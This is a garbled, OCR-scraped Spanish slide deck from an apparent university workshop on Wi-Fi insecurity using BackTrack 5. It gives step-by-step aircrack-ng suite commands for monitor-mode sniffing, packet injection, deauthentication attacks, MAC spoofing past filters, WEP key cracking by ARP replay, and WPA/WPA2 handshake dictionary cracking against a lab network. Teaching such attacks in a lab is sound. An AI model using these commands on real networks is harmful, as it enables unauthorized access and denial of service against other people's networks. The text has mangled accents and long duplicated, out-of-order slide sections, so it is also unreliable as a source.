httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
